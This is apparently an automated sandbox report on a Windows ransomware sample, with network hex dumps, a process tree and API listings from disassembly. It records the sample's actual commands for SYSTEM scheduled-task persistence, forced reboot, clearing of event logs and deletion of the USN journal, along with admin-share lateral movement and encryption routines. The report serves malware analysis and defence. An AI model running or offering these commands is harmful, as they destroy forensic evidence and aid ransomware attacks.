a4 f2 3f 82 55 89 c4 e3 25 09 e4 8e 2a 90 11 8d 36 dd 7f 97 ba 79 c1 2a c1 ca 15 ce 36 f5 3c 6a d4 34 7e 17 aa ac 87 ca d7 b4 51 89 5f 0c 18 16 34 4e 8b 0c 0b d8 f4 3d 48 f2 b7 56 00 a9 aa 89 4e 4c 6b 5c 85 84 55 32 40 ea 29 a9 a2 2b ab 02 03 01 00 01 a3 82 01 16 30 82 01 12 30 0f 06 09 2b 06 01 05 05 07 30 01 05 04 02 05 00 30 22 06 03 55 1d 11 04 1b 30 19 a4 17 30 15 31 13 30 11 06 03 55 04 03 13 0a 54 47 56 2d 45 2d 32 39 31 37 30 1f 06 03 55 1d 23 04 18 30 16 80 Data Ascii: 010&+000R6.FuH20171024140201Z0s0q0I0+Yq$r>wcNrA)8ubTXAD{R20171024140201Z20171031140201Z0H$3T{tEL](w6Rr1vUA$nXHmc$VQwoN!;>2~Dkei3"G[y'LBb{!`J\)B`tx#3eQ{lP;#hRu'EvBcmByZa3)(\z2 t@@JqAzq']:{Z0V0R0:al^D\0H0w10UUS10USymantec Corporation10USymantec Trust Network1(0&USymantec SHA256 TimeStamping CA0170910000000Z171209235959Z091705U.Symantec SHA256 TimeStamping CA OCSP Responder0"0H0#:C@:?5QqRbz;Cj=$qo\|\Xh;(W:UKTWJW,\|+Gj_Fr''8JHa,SUmeM\|8iR$#L??U%6y*6<j4~Q_4N=HVNLk\U2@)+00+00"U0010UTGV-E-29170U#0	25
Okt 25, 2017 10:19:15.518435001 MESZ	80	49167	23.54.91.27	192.168.1.16	Data Raw: 14 af 63 d6 ca a3 4e 85 72 e0 a7 bc 41 f3 29 a2 38 7f 80 75 62 30 1d 06 03 55 1d 0e 04 16 04 14 d7 13 bb f6 52 bf e9 00 ca 1f 87 36 96 e5 fa 2e 46 75 48 89 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 13 06 03 55 1d 25 04 0c 30 0a 06 08 2b 06 01 Data Ascii: cNrA)8ub0UR6.FuH0U00U%0+0U0hU a0_0]`HE0N0#+https://d.symcb.com/cps0'+0 https://d.symcb.com/rpa0*HQA{l;x	25

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: i0YxTJ2SO.exe PID: 3432 Parent PID: 3020

General

Start time:	10:18:40
Start date:	25/10/2017
Path:	C:\Users\user\Desktop\i0YxTJ2SO.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\i0YxTJ2SO.exe'
Imagebase:	0x75440000
File size:	441899 bytes
MD5 hash:	FBBDC39AF1139AEBBA4DA004475E8839
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: rundll32.exe PID: 3464 Parent PID: 3432

General

Start time:	10:18:40
Start date:	25/10/2017
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Imagebase:	0x71880000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3476 Parent PID: 3464

General

Start time:	10:18:40
Start date:	25/10/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c schtasks /Delete /F /TN rhaegal
Imagebase:	0x75440000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 3496 Parent PID: 3476

General

Start time:	10:18:41
Start date:	25/10/2017
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /Delete /F /TN rhaegal
Imagebase:	0x75170000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3512 Parent PID: 3464

General

Start time:	10:18:43
Start date:	25/10/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit'
Imagebase:	0x77390000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3524 Parent PID: 3464

General

Start time:	10:18:43
Start date:	25/10/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00
Imagebase:	0x75440000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: 9706.tmp PID: 3560 Parent PID: 3464

General

Start time:	10:18:43
Start date:	25/10/2017
Path:	C:\Windows\9706.tmp
Wow64 process (32bit):	false
Commandline:	'C:\Windows\9706.tmp' \\.\pipe\{EE91B260-F47B-4E8B-B208-21BD25A3C0CE}
Imagebase:	0x77390000
File size:	53624 bytes
MD5 hash:	37945C44A897AA42A66ADCAB68F560E0
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 3568 Parent PID: 3512

General

Start time:	10:18:43
Start date:	25/10/2017
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR 'C:\Windows\system32\cmd.exe /C Start \'\' \'C:\Windows\dispci.exe\' -id 3818518496 && exit'
Imagebase:	0x73d30000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 3608 Parent PID: 3524

General

Start time:	10:18:43
Start date:	25/10/2017
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /Create /SC once /TN drogon /RU SYSTEM /TR 'C:\Windows\system32\shutdown.exe /r /t 0 /f' /ST 10:36:00
Imagebase:	0x73d30000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3656 Parent PID: 3464

General

Start time:	10:18:45
Start date:	25/10/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Imagebase:	0x75790000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wevtutil.exe PID: 3688 Parent PID: 3656

General

Start time:	10:36:00
Start date:	25/10/2017
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	wevtutil cl Setup
Imagebase:	0x76eb0000
File size:	175616 bytes
MD5 hash:	81538B795F922B8DA6FD897EFB04B5EE
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: shutdown.exe PID: 3708 Parent PID: 1568

General

Start time:	10:36:00
Start date:	25/10/2017
Path:	C:\Windows\System32\shutdown.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\shutdown.exe /r /t 0 /f
Imagebase:	0x77390000
File size:	30720 bytes
MD5 hash:	61739432482891F2DC5745CCA0A67028
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wevtutil.exe PID: 3748 Parent PID: 3656

General

Start time:	10:36:01
Start date:	25/10/2017
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	wevtutil cl System
Imagebase:	0x74ec0000
File size:	175616 bytes
MD5 hash:	81538B795F922B8DA6FD897EFB04B5EE
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wevtutil.exe PID: 3820 Parent PID: 3656

General

Start time:	10:36:01
Start date:	25/10/2017
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	wevtutil cl Security
Imagebase:	0x76eb0000
File size:	175616 bytes
MD5 hash:	81538B795F922B8DA6FD897EFB04B5EE
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 3836 Parent PID: 3464

General

Start time:	10:36:02
Start date:	25/10/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c schtasks /Delete /F /TN drogon
Imagebase:	0x77390000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: wevtutil.exe PID: 3844 Parent PID: 3656

General

Start time:	10:36:02
Start date:	25/10/2017
Path:	C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):	false
Commandline:	wevtutil cl Application
Imagebase:	0x76eb0000
File size:	175616 bytes
MD5 hash:	81538B795F922B8DA6FD897EFB04B5EE
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: LogonUI.exe PID: 3900 Parent PID: 348

General

Start time:	10:36:02
Start date:	25/10/2017
Path:	C:\Windows\System32\LogonUI.exe
Wow64 process (32bit):	false
Commandline:	'LogonUI.exe' /flags:0x0
Imagebase:	0x74a40000
File size:	10752 bytes
MD5 hash:	3EF0D8AB08385AAB5802E773511A2E6A
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 3928 Parent PID: 3836

General

Start time:	10:36:04
Start date:	25/10/2017
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):
Commandline:	unknown
Imagebase:
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: fsutil.exe PID: 3976 Parent PID: 3656

General

Start time:	10:36:04
Start date:	25/10/2017
Path:	C:\Windows\System32\fsutil.exe
Wow64 process (32bit):
Commandline:	unknown
Imagebase:
File size:	74240 bytes
MD5 hash:	B4834F08230A2EB7F498DE4E5B6AB814
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: i0YxTJ2SO.exe PID: 3432 Parent PID: 3020

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7%
Total number of Nodes:	86
Total number of Limit Nodes:	13

Executed Functions

Function 003E1690, Relevance: 1.3, Strings: 1, Instructions: 54

Strings

1.2.8, xrefs: 003E16BE

Memory Dump Source

Source File: 00000001.00000002.391333230.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000001.00000002.391307710.003E0000.00000002.sdmp
Associated: 00000001.00000002.391369465.003E4000.00000002.sdmp
Associated: 00000001.00000002.391411778.003E8000.00000004.sdmp
Associated: 00000001.00000002.391460513.003E9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3e0000_i0YxTJ2SO.jbxd

Function 003E12C0, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 138

APIs

GetCommandLineW.KERNEL32 ref: 003E12DF
GetCommandLineW.KERNEL32 ref: 003E12FC
CommandLineToArgvW.SHELL32(00000000), ref: 003E12FF
wcsstr.MSVCRT ref: 003E133D
GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 003E139B
lstrcatW.KERNEL32(?,\rundll32.exe), ref: 003E13B5

Part of subcall function 003E10C0: GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 003E10F8
Part of subcall function 003E10C0: GetModuleFileNameW.KERNEL32(00000000), ref: 003E10FF
Part of subcall function 003E10C0: GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 003E1172
Part of subcall function 003E10C0: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,?), ref: 003E1179
Part of subcall function 003E10C0: memcpy.MSVCRT ref: 003E1192
Part of subcall function 003E10C0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 003E11BB
Part of subcall function 003E10C0: RtlAllocateHeap.NTDLL(00000000), ref: 003E11BE
Part of subcall function 003E10C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E1207
Part of subcall function 003E10C0: HeapFree.KERNEL32(00000000), ref: 003E120A

Part of subcall function 003E1260: CreateFileW.KERNEL32(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000), ref: 003E1277
Part of subcall function 003E1260: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 003E128F
Part of subcall function 003E1260: CloseHandle.KERNEL32(00000000), ref: 003E12A4

wsprintfW.USER32 ref: 003E1418
CreateProcessW.KERNEL32 ref: 003E1479
ExitProcess.KERNEL32 ref: 003E1481

Part of subcall function 003E1499: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003E1566
Part of subcall function 003E1499: UnhandledExceptionFilter.KERNEL32(003E4080), ref: 003E1571
Part of subcall function 003E1499: GetCurrentProcess.KERNEL32(C0000409), ref: 003E157C
Part of subcall function 003E1499: TerminateProcess.KERNEL32(00000000), ref: 003E1583

Strings

infpub.dat, xrefs: 003E1400
%ws C:\Windows\%ws,#1 %ws, xrefs: 003E1412
\rundll32.exe, xrefs: 003E13A9
D, xrefs: 003E146F

Memory Dump Source

Source File: 00000001.00000002.391333230.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000001.00000002.391307710.003E0000.00000002.sdmp
Associated: 00000001.00000002.391369465.003E4000.00000002.sdmp
Associated: 00000001.00000002.391411778.003E8000.00000004.sdmp
Associated: 00000001.00000002.391460513.003E9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3e0000_i0YxTJ2SO.jbxd

Function 003E10C0, Relevance: 13.6, APIs: 9, Instructions: 133

APIs

GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 003E10F8
GetModuleFileNameW.KERNEL32(00000000), ref: 003E10FF
GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 003E1172
RtlAllocateHeap.NTDLL(00000000,?,00000000,?,?), ref: 003E1179
memcpy.MSVCRT ref: 003E1192
GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 003E11BB
RtlAllocateHeap.NTDLL(00000000), ref: 003E11BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E1207
HeapFree.KERNEL32(00000000), ref: 003E120A

Part of subcall function 003E1499: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003E1566
Part of subcall function 003E1499: UnhandledExceptionFilter.KERNEL32(003E4080), ref: 003E1571
Part of subcall function 003E1499: GetCurrentProcess.KERNEL32(C0000409), ref: 003E157C
Part of subcall function 003E1499: TerminateProcess.KERNEL32(00000000), ref: 003E1583

Part of subcall function 003E1000: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003E101A
Part of subcall function 003E1000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 003E102D
Part of subcall function 003E1000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 003E103D
Part of subcall function 003E1000: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 003E1044
Part of subcall function 003E1000: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003E1060
Part of subcall function 003E1000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 003E1071
Part of subcall function 003E1000: HeapFree.KERNEL32(00000000,?,?), ref: 003E1078
Part of subcall function 003E1000: CloseHandle.KERNEL32(00000000), ref: 003E1080
Part of subcall function 003E1000: CloseHandle.KERNEL32(00000000), ref: 003E10A4

Memory Dump Source

Source File: 00000001.00000002.391333230.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000001.00000002.391307710.003E0000.00000002.sdmp
Associated: 00000001.00000002.391369465.003E4000.00000002.sdmp
Associated: 00000001.00000002.391411778.003E8000.00000004.sdmp
Associated: 00000001.00000002.391460513.003E9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3e0000_i0YxTJ2SO.jbxd

Function 003E1000, Relevance: 13.6, APIs: 9, Instructions: 79

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003E101A
GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 003E102D
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 003E103D
RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 003E1044
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003E1060
GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 003E1071
HeapFree.KERNEL32(00000000,?,?), ref: 003E1078
CloseHandle.KERNEL32(00000000), ref: 003E1080
CloseHandle.KERNEL32(00000000), ref: 003E10A4

Memory Dump Source

Source File: 00000001.00000002.391333230.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000001.00000002.391307710.003E0000.00000002.sdmp
Associated: 00000001.00000002.391369465.003E4000.00000002.sdmp
Associated: 00000001.00000002.391411778.003E8000.00000004.sdmp
Associated: 00000001.00000002.391460513.003E9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3e0000_i0YxTJ2SO.jbxd

Function 003E1260, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36

APIs

CreateFileW.KERNEL32(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000), ref: 003E1277
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 003E128F
CloseHandle.KERNEL32(00000000), ref: 003E12A4

Strings

C:\Windows\infpub.dat, xrefs: 003E1272

Memory Dump Source

Source File: 00000001.00000002.391333230.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000001.00000002.391307710.003E0000.00000002.sdmp
Associated: 00000001.00000002.391369465.003E4000.00000002.sdmp
Associated: 00000001.00000002.391411778.003E8000.00000004.sdmp
Associated: 00000001.00000002.391460513.003E9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3e0000_i0YxTJ2SO.jbxd

Function 003E3393, Relevance: 1.3, APIs: 1, Instructions: 9

APIs

malloc.MSVCRT ref: 003E339E

Memory Dump Source

Source File: 00000001.00000002.391333230.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000001.00000002.391307710.003E0000.00000002.sdmp
Associated: 00000001.00000002.391369465.003E4000.00000002.sdmp
Associated: 00000001.00000002.391411778.003E8000.00000004.sdmp
Associated: 00000001.00000002.391460513.003E9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3e0000_i0YxTJ2SO.jbxd

Non-executed Functions

Function 003E1499, Relevance: 6.0, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003E1566
UnhandledExceptionFilter.KERNEL32(003E4080), ref: 003E1571
GetCurrentProcess.KERNEL32(C0000409), ref: 003E157C
TerminateProcess.KERNEL32(00000000), ref: 003E1583

Memory Dump Source

Source File: 00000001.00000002.391333230.003E1000.00000020.sdmp, Offset: 003E0000, based on PE: true

Associated: 00000001.00000002.391307710.003E0000.00000002.sdmp
Associated: 00000001.00000002.391369465.003E4000.00000002.sdmp
Associated: 00000001.00000002.391411778.003E8000.00000004.sdmp
Associated: 00000001.00000002.391460513.003E9000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3e0000_i0YxTJ2SO.jbxd

Analysis Process: rundll32.exe PID: 3464 Parent PID: 3432

Execution Graph

Execution Coverage:	22.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	23.9%
Total number of Nodes:	1420
Total number of Limit Nodes:	13

Executed Functions

Function 00479534, Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 244

APIs

wsprintfW.USER32 ref: 0047957E

Part of subcall function 004788D3: PathFindFileNameW.SHLWAPI(C:\Windows\infpub.dat), ref: 004788E3

wsprintfW.USER32 ref: 004795C9
wsprintfW.USER32 ref: 004795EF
PathFindExtensionW.SHLWAPI(?), ref: 004795FC
wsprintfW.USER32 ref: 0047961A
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00479637
PathFileExistsW.SHLWAPI(?), ref: 00479649
GetLastError.KERNEL32 ref: 00479653

Part of subcall function 004787E7: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004787FC
Part of subcall function 004787E7: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00478813
Part of subcall function 004787E7: CloseHandle.KERNEL32(00000000), ref: 00478824

GetLastError.KERNEL32(?), ref: 00479674
WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 004796B9
DeleteFileW.KERNEL32(?), ref: 0047983E

Part of subcall function 004768B5: GetProcessHeap.KERNEL32(00000008,?,761B423D,00000000), ref: 004768EB
Part of subcall function 004768B5: HeapAlloc.KERNEL32(00000000), ref: 004768F4
Part of subcall function 004768B5: memcpy.MSVCRT ref: 00476921
Part of subcall function 004768B5: GetProcessHeap.KERNEL32(00000008,?,757DCF90), ref: 00476946
Part of subcall function 004768B5: HeapAlloc.KERNEL32(00000000), ref: 00476949
Part of subcall function 004768B5: memcpy.MSVCRT ref: 00476978
Part of subcall function 004768B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 00476995
Part of subcall function 004768B5: HeapFree.KERNEL32(00000000), ref: 00476998
Part of subcall function 004768B5: GetProcessHeap.KERNEL32(00000000,?), ref: 0047699F
Part of subcall function 004768B5: HeapFree.KERNEL32(00000000), ref: 004769A2

OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 00479714
memset.MSVCRT ref: 00479735
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00479742
wsprintfW.USER32 ref: 0047975A
CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00479783
StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00479798
GetLastError.KERNEL32 ref: 004797A6
QueryServiceStatus.ADVAPI32(?,?), ref: 004797D5
Sleep.KERNEL32(00001388), ref: 004797E7
DeleteService.ADVAPI32(?), ref: 004797F7
CloseServiceHandle.ADVAPI32(?), ref: 00479801
GetLastError.KERNEL32 ref: 00479809
CloseServiceHandle.ADVAPI32(?), ref: 00479822
GetLastError.KERNEL32 ref: 0047982A
WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 00479857
SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,0047A0AD,00000000,00000000,00000000,00000000,00476AA8,00000000,00000000,00000000,00000024,00476AA8), ref: 00479878

Strings

%08X%08X, xrefs: 00479754
W, xrefs: 0047985F
\\%s\admin$, xrefs: 00479578
cscc.dat, xrefs: 0047960B
\\%ws\admin$\%ws, xrefs: 004795BB, 004795C7, 004795ED, 00479618

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004715A7, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 152

APIs

GetProcessHeap.KERNEL32(00000008,00000010,773E29EE,?,757DFE8D), ref: 004715D9
HeapAlloc.KERNEL32(00000000), ref: 004715E2
CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 00471603
GetProcessHeap.KERNEL32(00000008,00000020), ref: 00471633
HeapAlloc.KERNEL32(00000000), ref: 00471636
CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 0047166E
CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 00471688
CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 0047169C
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004716AD
HeapFree.KERNEL32(00000000), ref: 004716B4
CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 004716CA
CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 004716E8
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00471701
CryptDestroyHash.ADVAPI32(?), ref: 0047171A
CryptDestroyKey.ADVAPI32(?), ref: 00471728
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00471737

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 004715F8

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476FFE, Relevance: 25.6, APIs: 17, Instructions: 125

APIs

GetProcessHeap.KERNEL32(00000008,00000014), ref: 00477025
HeapAlloc.KERNEL32(00000000), ref: 00477028
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0047703C
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 00477051
CreateNamedPipeW.KERNEL32(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 0047706F
ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 0047707F
PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 0047709F
Sleep.KERNELBASE(000003E8), ref: 004770B3
GetProcessHeap.KERNEL32(00000008,?), ref: 004770C4
HeapAlloc.KERNEL32(00000000), ref: 004770C7
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 004770E2
StrChrW.SHLWAPI(00000000,0000003A), ref: 004770F7

Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000008,?,76EBE52D,00000000,00000000), ref: 004769E3
Part of subcall function 004769AE: HeapAlloc.KERNEL32(00000000), ref: 004769EC
Part of subcall function 004769AE: memcpy.MSVCRT ref: 00476A19
Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000008,?), ref: 00476A3D
Part of subcall function 004769AE: HeapAlloc.KERNEL32(00000000), ref: 00476A40
Part of subcall function 004769AE: memcpy.MSVCRT ref: 00476A6F
Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000000,?,002F16E0,?,?), ref: 00476A8F
Part of subcall function 004769AE: HeapFree.KERNEL32(00000000), ref: 00476A92
Part of subcall function 004769AE: GetProcessHeap.KERNEL32(00000000,?), ref: 00476A99
Part of subcall function 004769AE: HeapFree.KERNEL32(00000000), ref: 00476A9C

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00477114
HeapFree.KERNEL32(00000000), ref: 00477117
FlushFileBuffers.KERNEL32(?), ref: 00477120
DisconnectNamedPipe.KERNEL32(?), ref: 00477129
CloseHandle.KERNEL32(?), ref: 00477132

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00475BC4, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 127

APIs

GetSystemInfo.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,?,?,?,00475E4C,?,?,00000000), ref: 00475BE3
__alldiv.INT64 ref: 00475C14
MapViewOfFile.KERNELBASE(00000000,00000006,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475C39
CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475C5D
CryptHashData.ADVAPI32(00000000,00000000,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475C75
LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475C8B
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475CA4
memcpy.MSVCRT ref: 00475CB8
FlushViewOfFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00475E4C,?,?), ref: 00475CDC
LocalFree.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475CE8
CryptDestroyHash.ADVAPI32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475CF1
UnmapViewOfFile.KERNEL32(?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 00475CFA

Strings

encrypted, xrefs: 00475CC6
